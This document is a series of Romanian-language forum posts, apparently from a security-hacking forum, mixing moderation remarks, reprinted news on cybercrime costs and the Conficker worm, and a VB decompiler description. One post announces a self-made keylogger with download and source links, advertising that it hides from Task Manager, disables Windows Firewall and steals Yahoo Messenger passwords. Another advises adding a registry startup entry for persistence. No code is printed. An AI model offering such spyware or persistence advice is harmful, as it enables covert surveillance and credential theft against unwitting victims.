Nytro

nosferatu: De cand sa ai Linux inseamna sa fi hacker?

In primul rand fereastra aceea, in caz ca nu ti-ai dat seama, e de la client. Acea fereastra te anunta ca serverul s-a conectat si te intreaba daca sa dai start la keylogging. Cand se deschide serverul nu apare nici o fereastra.

Ce fereastra a aparut? Scria "Connected to" ?

Name: Digital Keylogger Version: 3.3 Author: Nytro Released: 1 Februarie 2009 Powered by: Romanian Security Team Website: www.rstcenter.com Old stuff. Server size: - packed: 36.0 KB - unpacked: 112 KB Screenshot: Download: http://rapidshare.com/files/352506542/Digital_Keylogger_v3.3.exe http://www.speedyshare.com/files/21007721/Digital_Keylogger_v3.3.exe http://www.megaupload.com/?d=0NCYCZXH http://www.fileshare.ro/3215298240.5 http://www.mediafire.com/?gwialmelyrk Optiuni: - Nu apare in Task Manager la procese - Inchide Windows Firewall - Get keylog automaticaly - Gey keylog manual - Se conecteaza automat, trebuie decat sa fie clientul deschis - Close Y! pentru a fura parola de mess - Bla bla... Problema: Nu se pot conecta mai multe servere la acelasi client, o sa fac sa se poata. In plus o sa pastrez lungimea ultimei sectiuni a executabilului pe care serverul acesta o are stricata. Si mai fac si alta grafica... Timp sa am si plictisit sa fiu. Cod sursa: https://rstforums.com/proiecte/DK_v3.3.zip

O sa le pun pe toate intr-un pack dupa ce strang mai multe.

Si cum se realizeaza comunicatia client ( PC banuiesc ) si server ( telefon ), prin Bluetooth? Cred ca in VS2008 se poate pentru Windows Mobile, dar nu cred ca telefonul permite executarea oricaror comenzi.

E banal... Dar interesant

Infractiunile cibernetice fac pagube de miliarde de dolari de Bianca Dinu | 30 Ianuarie 2009 Furtul datelor si bresele de securitate cauzate de infractiunile cibernetice au costat companiile din intrega lume mii de miliarde de dolari americani. Pagubele de anul trecut au constat, de cele mai multe ori, in pierderea sau furtul proprietatilor intelectuale si in investitiile ulterioare in repararea sistemelor afectate, potrivit unui studiu realizat de McAfee. Studiul a avut la baza un chestionar la care au raspuns sute de manageri IT din Statele Unite, Europa si China. Respondentii au estimat ca au pierdut date in valoare totala de aproximativ 4.6 miliarde de dolari si au cheltuit, individual, peste 600 de milioane pentru a isi securiza sistemele de lucru. De asemenea, McAfee a relatat, fara surprindere de altfel, ca tarile dezvoltate investesc mai mult in protejarea datelor si a proprietatii intelectuale decat cele mai slab dezvoltate. O alta concluzie a studiului a fost aceea ca recesiunea la care sunt supuse companiile din intreaga lume nu face decat sa creasca riscurile de securitate. 42% dintre respondenti au declarat ca lucratorii care au fost disponibilizati, in ultimul timp, au fost cea mai mare amenintare asupra informatiilor sensibile din retelele companiilor. Interesant este faptul ca peste un sfert dintre participantii la studiu au declarat ca evita sa-si pastreze datele pe serverele din China, in timp de 47% dintre respondentii chinezi au sustinut ca, din punctul lor de vedere, SUA este cea mai mare amenintare in ceea ce priveste datele lor. Sursa: CNet

Nu imi place ideea. Toti leecherii ar aparea cu conturi de pe google sau cu ce cersesc si ei de la altii. Putini ar veni cu "munca" lor.

Yep, ditamai javra. Asta e, viata e grea, in viata dai peste multe javre ca mine. Eu te ajut sa te obisnuiesti cu ele.

Nu stiu daca cu hexatul te-ai referit la mine, dar nu prea ai cum hexa cu el. Si warn-urile le meriti, la urmatoarea abatere ban. E greu sa vorbesti frumos?

VB Decompiler is decompiler for programs (EXE, DLL or OCX) written in Visual Basic 5.0/6.0. As you know, programs in Visual Basic can be compiled into interpreted p-code or into native code. Since p-code consists of high-level commands, there is a real possibility to decompile it into the source code (of course, the names of variables and some functions will not be decompiled). VB Decompiler restores source code from p-code as much as possible precisely. And after some modifications you may try to compile generated code. If a program was compiled into the native code, restoring full source code from machine instructions is not possible. But VB decompiler can help to analyze the program even in this situation as well. It contains a powerful disassembler and emulator. This powerfull engine try to decode most assembler instructions to most likely VB commands. Of course, it fails on some optimizations of assembler code and sometimes generate not correct instructions. But at this time this is a best way to analyze native code applications. In general, VB Decompiler is an ideal tool for analyzing programs and it is perfect if you lose the source code and need to partially restore the project. What's new in this version: - New unpacker engine - Help files changed - "For Each" decompilation in Native Code - Screen object - Printer object - Clipboard object - vbGlobal parsing - vbSingle type of data - Dispatch vbaLate functions parser - Clear FPU error checking and objects checking instruction in Native Code - rtcGetErl decompilation - Objects declaration in P-Code - Parsing "Set" opcode and use this variables in object reference - "FnIntVar" decompilation in P-Code - Resorting history after deleting items - FRX Viewer plugin (need .NET Framework 2.0) - New type of renaming Unknown functions - BugFix: P-Code Put and Get opcodes - BugFix: Procedure analyzer and optimizer no don't clear some variables - BugFix: Clear "@" chars in names of P-Code procedures and functions - BugFix: Parameters in VTable Get/Let/Set procedures Download: http://www.vb-decompiler.org/files/vb_decompiler_lite.zip Mirror: http://www.download.com/VB-Decompiler/3000-2218_4-10505570.html?part=dl-VBDecompi&subj=dl&tag=button&cdlPid=10991008

Nu e facut de mine, nici nu stiu de ce e in stare, o fi si el bun de ceva. Parca aveam sursa unei versiuni mai vechi, dar nu o gasii.

Download: http://www.sendspace.com/file/4fzs1q

Trebuie scris in Registry sa ruleze la StartUp, vezi "reg", mai exact "reg add".

Cu placere, daca ai nevoie de ajutor, PM. Si astept sa vad ce ai reusit

Si bulgarii sunt obsedati de CQ... Ban.

Nu prea ai cum sa afli un anumit user e logat, iar metoda cu opi sau persiangap nu e cea mai buna solutie. O metoda ar fi, daca e decat un user logat, sa verifici daca utilizatorul e online atunci cand vrei sa schimbi statusul. Programul citeste la un interval stabilit ID-ul si statusul apoi, daca statusul e altul, nu ultimul, il schimba. Cea mai buna idee dupa parerea mea e ca atunci cand programul citeste un alt status, sa verifice daca ID-ul citit de pe Web, apoi, daca ID-ul citit de pe Web e online, sa schimbe statusul. PS: Pote gasesti ceva util: http://planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=71103&lngWId=1

Download: http://www.mininova.org/tor/1579598

Mai bine ban.

Esti sigur ca nu ai folosit mswinsck?

Tot nu am inteles exact ce vrei. Nu e nevoie de nici o monitorizare. Uite cam ce face proiectul de mai sus. Tu intri pe o pagina Web si scri: status, daca sa fie busy sau nu si ID de messenger. Programul citeste ce ai scris tu pentru ca salveaza aceste date intr-o baza de date, si scrie in Registry la ID-ul specificat, statusul specificat, apoi cauta fereastra de messenger si seteaza ultimul status. Nu scri nimic in executabil, nici un ID, iar daca se logheaza altcineva in loc de ID-ul stabilit de tine, programul va scrie statusul la ID-ul stabilit de tine, apoi va seta ultimul status la messenger pe contul activ. Daca nu e bifata optiunea Remember nu poti afla userul, de fapt se poate, asa cum se poate afla si parola, dar nue frumos acest lucru.

Warn la primul post. Bun inceput.

Noua amenintare: Conficker worm de Alex Hanea | 27 Ianuarie 2009 System Plus, alaturi de companii din intreaga lume, semnaleaza extinderea semnificativa a infectiei cu virusul Conficker (sau Downandup, Kido), detectat pentru prima data in octombrie 2008. Conficker este un vierme; un program malitios ce se instaleaza pe un sistem de calcul ca apoi sa afecteze functionarea normala a acestuia, continuand sa infecteze si alte calculatoare, eventual chiar sustragand informatii confidentiale pe care sa le transmita celui care l-a creat. Conficker se folosese de o vulnerabilitate existenta in sistemele de operare Windows (in Windows Server Service) pentru a se instala pe computerul victima, dupa care se ataseaza unor programe rulate in mod curent (svchost.exe, explorer.exe, services.exe). Desi scopul acestui vierme nu a fost inca stabilit, analistii se asteapta ca in viitorul apropiat cele peste 9 milioane de PC-uri deja infectate in intreaga lume sa fie folosite pentru un atac pe scara larga. Printre simptomele infectarii se numara: dezactivarea Windows Automatic Update, Windows Security Center, Windows Defender si Error Reporting Service, precum si un trafic in retea deosebit de mare, ducand la congestionarea acesteia. Expertii sustin ca este cea mai grava infectare din ianuarie 2003, cand slammer a explodat pe Internet. Conficker nu numai ca s-a raspandit instant pe Internet, el a si unit calculatoarele in botnet-uri care accepta instructiuni de comanda de la cei care se afla in spatele virusului. Multi utilizatori pot sa nu isi dea seama ca au calculatorul infectat, in timp ce virusul continua sa se raspandeasca folosindu-se de calculatorul lor sau, mai rau, sustrage deja informatii de pe el. Expertii de la Qualys au estimat ca 30% dintre calculatoarele bazate pe windows sunt in continuare vulnerabile, deoarece nu au fost descarcate ultimele patch-uri, desi acestea au fost disponibile inca din octombrie 2008. Companiile de securitate din intreaga lume se asteapta ca in perioada urmatoare sa apara si comenzile care sa controleze calculatoarele virusate. Cine sunt cei care se afla in spatele viermelui si care sunt scopurile pe care le urmaresc, inca nu se cunoaste. Aparent, in spatele lui s-ar afla, conform datelor catorva companii de securitate, un grup din Europa de Est, posibilitate identificata printr-o paralela a manierei de scriere a virusului. Mai mult, se pare ca intr-o prima versiune, viermele verifica daca exista tastatura ucrainiana, caz in care viermele nu mai infecta calculatorul. Pentru a putea preveni infectarea, este recomandata folosirea exclusiva a software-ului autentic pentru a avea acces la cele mai noi update-urilor furnizate de Microsoft si folosirea unui antivirus. De asemeni, dat fiind ca viermele se instaleaza automat de pe medii externe infectate (cum ar fi stick-urile USB) este recomandata dezactivarea functiei AutoRun. Sursa: System Plus, Newsfactor

Deci nu o sa fie niciodata 2 ID-uri online in acelasi timp? Executabilul schimba statusul la ID-ul pe care il citeste de pe Web, care poate fi setat. Adica, dupa ce ai pornit executabilul, pleci de acasa si intri pe Web sa schimbi statusul la un alt PC. Si acolo scri ID-ul tau, apoi apesi sa se schimbe statusul. Programul citeste ID-ul pe care l-ai setat pe site si schimba statusul pentru el. Daca in acest timp e online fratele tau, i se va seta ca status ultimul status. Un mic bug... Cat despre a afla daca cineva e pe invizibil eu am folosit la Yahoo! Manager ( open-source ) persiangap.com .